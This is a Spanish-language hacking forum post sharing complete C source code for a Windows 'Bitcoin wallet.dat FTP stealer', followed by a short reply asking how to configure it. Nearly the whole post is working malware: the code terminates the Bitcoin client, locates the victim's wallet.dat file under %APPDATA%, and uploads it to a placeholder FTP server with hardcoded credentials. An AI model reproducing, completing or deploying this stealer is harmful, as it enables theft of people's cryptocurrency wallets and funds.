Bitcoin Wallet.dat FTP Stealer Source

Iniciado por ANTRAX, Abril 12, 2012, 02:45:11 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Abril 12, 2012, 02:45:11 PM Ultima modificación: Febrero 08, 2014, 05:45:10 PM por Expermicid
Código: c
// Coded by JuryBen
// Gimme coins
// 1LEXm6E4L9Ug9VNpkvXwJiZb61tspRiK7v

#include <windows.h>
#include <tlhelp32.h>
#include <tchar.h>
#include <wininet.h>
#include <ctime>
#include <iostream>
#pragma comment(lib, "wininet")

void killprocess()
{   

HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 ); // Get the process list snapshot.
PROCESSENTRY32 ProcessEntry = { 0 }; // Initialize the process entry structure.
ProcessEntry.dwSize = sizeof( ProcessEntry ); // Get the first process info
BOOL Return = FALSE;
Return = Process32First( hProcessSnapShot,&ProcessEntry );

int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
if (value==0)
{
HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID); //Open Process to terminate
TerminateProcess(hProcess,0);
CloseHandle(hProcess); //Close Handle }

}

while( Process32Next( hProcessSnapShot, &ProcessEntry ));
CloseHandle( hProcessSnapShot );
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{

killprocess();
Sleep(40000);
srand((unsigned)time(NULL)); // we get time to use for random seed
int seedone=rand(); // seed one
    int seedtwo=rand()*3; // seed two times 3
int seedboth = seedone + seedtwo; // combine seeds to ensure random int
// now we need to convert int to char
char randomseed[99]; // make randomseed buffer at 99 to prevent overflow
    itoa(seedboth,randomseed,10); // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
// did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name

char* appdata = getenv("APPDATA"); //Gets %Appdata% path
char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat");  //Bitcoin file to steal

//ftp connection
HINTERNET hInternet;
HINTERNET hFtpSession;
hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "[email protected]", "bigdickben", INTERNET_SERVICE_FTP, 0, 0);  //ftp host, user, pass

FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);

InternetCloseHandle(hFtpSession);
InternetCloseHandle(hInternet);

return 0;
}


Autor: itz me


Hola antrax es un keyloger o un miner, como se configura.